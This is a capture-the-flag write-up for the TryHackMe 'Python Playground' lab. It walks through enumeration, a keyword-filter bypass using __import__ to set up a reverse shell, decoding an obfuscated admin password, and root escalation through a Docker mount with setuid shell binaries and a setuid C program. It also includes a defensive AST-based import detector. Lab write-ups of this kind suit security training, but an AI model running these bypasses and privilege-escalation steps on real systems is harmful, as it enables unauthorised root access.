TryHackMe : Python Playground

H0j3n
4 min read · Jun 29, 2020


Be creative!

Since the title says Python, we will surely run into a lot of Python, so let's get started!

Enumeration

Let's run nmap first and see what we get.

22/tcp open  ssh     syn-ack ttl 61 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3
80/tcp open  http    syn-ack ttl 60 Node.js Express framework

Port 80 (HTTP)

Port 80

On the page we can find the login and signup links.

Login & Signup Page

But neither the login nor the signup page opens; both give the output shown. So let's use Gobuster to check for any files or directories that are available.

Gobuster Results

Let’s take a look at the admin.html page.

admin.html (login page)

We got the admin login page? But we do not have any credentials yet, so let's open the page source.

Page source admin.html

By looking at the source code we learn that the real password is encoded with int_array_to_text() & string_to_int_array(), but we also get the name of another HTML page. Let's try that one first!

super-secret-admin-testing-panel.html

Nice! Now we need to run a reverse shell using Python. The problem is that if we paste the normal reverse shell, the panel reports Security threat detected! So I found another way to get a reverse shell, knowing that import is what gets detected as a threat.

# __import__ is the builtin behind the import statement; the panel's check
# flags the import keyword but not this call, so the same modules load
socket = __import__("socket")
subprocess = __import__("subprocess")
os = __import__("os")
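The room does not show the panel's filter, so as an added example (not the room's code; the word-boundary regex is my assumption about what such a keyword check looks like) here is a naive keyword filter beside an AST-based check that also catches the __import__ form. It is a better detector, not a sandbox.

```python
import ast
import re

# Constructed samples: the plain reverse-shell prelude the panel rejects,
# the __import__ form used in the writeup, and a harmless submission.
PLAIN_IMPORT = "import socket\nimport subprocess\nimport os\n"
DUNDER_IMPORT = ('socket = __import__("socket")\n'
                 'subprocess = __import__("subprocess")\n'
                 'os = __import__("os")\n')
HARMLESS = "total = sum(range(10))\nprint(total)\n"


def naive_filter(code):
    """Hypothetical keyword check that flags a whole-word 'import'."""
    # '_' counts as a word character, so the \b boundary never sits
    # between '__' and 'import': the dunder call slips straight through.
    return re.search(r"\bimport\b", code) is not None


def ast_filter(code):
    """Parse the submission and flag every import mechanism the syntax
    tree exposes: import statements plus any name or attribute reference
    to __import__, however it is spelled out or aliased."""
    try:
        tree = ast.parse(code)
    except SyntaxError:
        # Reject what cannot be parsed instead of guessing at it.
        return True
    for node in ast.walk(tree):
        if isinstance(node, (ast.Import, ast.ImportFrom)):
            return True
        if isinstance(node, ast.Name) and node.id == "__import__":
            return True
        if isinstance(node, ast.Attribute) and node.attr == "__import__":
            return True
    return False


if __name__ == "__main__":
    for label, sample in [("plain", PLAIN_IMPORT),
                          ("dunder", DUNDER_IMPORT),
                          ("harmless", HARMLESS)]:
        print(f"{label:8} naive={naive_filter(sample)} ast={ast_filter(sample)}")
```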

Flag 1

flag1.txt

The user is root? Let's put that aside for now and cat the flag. We got our first flag!

Flag 2

If we remember correctly, there is a hash that was encoded with multiple functions. It's written in PHP, so I converted it to Python.

# String to integer array: each character becomes two numbers,
# its code point divided by 26 and the remainder mod 26
# (integer division; Python 3's / would produce floats)
def str_to_int(temp):
    listarr = []
    for i in temp:
        listarr.append(ord(i) // 26)
        listarr.append(ord(i) % 26)
    return listarr

# Integer array to string: each number is shifted into 'a'..'z'
def int_to_str(temp):
    strs = ""
    for i in temp:
        strs += chr(i + 97)
    return strs

To get the password back we need to do some reversing, and it took me a while to reverse it haha.

# Reverse of int_to_str: letters back to the integer array
def rev_int_to_str(temp):
    strs = []
    for i in temp:
        strs.append(ord(i) - 97)
    return strs

# Reverse of str_to_int: each (quotient, remainder) pair back to a character
def rev_str_to_int(temp):
    strs = ""
    for i in range(0, len(temp) - 1, 2):
        temp2 = int(temp[i] * 26)
        temp2 += int(temp[i + 1])
        strs += chr(temp2)
    return strs

So to recover the password we reverse the encoding: since the original applied its two functions twice, we apply the two reverse functions twice, in the opposite order. It should look like this:

rev_str_to_int(rev_int_to_str(rev_str_to_int(rev_int_to_str(hash))))

We got the password! Since we know that Connor is the one who secured the password, let's try to SSH in as that user. It works, and we can cat the second flag!

flag2.txt

Flag 3

I tried linPEAS, but I couldn't connect any of its findings haha. If we remember correctly, though, the first shell we got was root inside a Docker container, so it must be related to that. After a lot of enumeration we can see that there is a mount point in the Docker container. I created a file with a unique name, h0j3n.txt, and searched for it from Connor's shell using this command.

find / -name h0j3n.txt 2>/dev/null

Yes! We managed to find it from Connor's shell. There are many ways to escalate Connor to root, so I will show you two of them!

First

#Docker Container (/mnt/log is the host's /var/log, mounted into the container)
cp /bin/sh /mnt/log
chmod +s /mnt/log/sh
#Connor Shell (-p keeps the effective root uid instead of dropping it)
/var/log/sh -p

Second

#include <unistd.h>

int main()
{
    setuid(0);                                /* root-owned setuid binary: become root */
    execl("/bin/bash", "bash", (char *)NULL); /* replace this process with a root bash */
    return 0;
}

Create a file, shell.c, with this code.

#Docker Container (run from inside /mnt/log so the binary lands on the shared mount)
gcc shell.c -o shell
chmod +s shell
#Connor Shell
/var/log/shell
flag3.txt
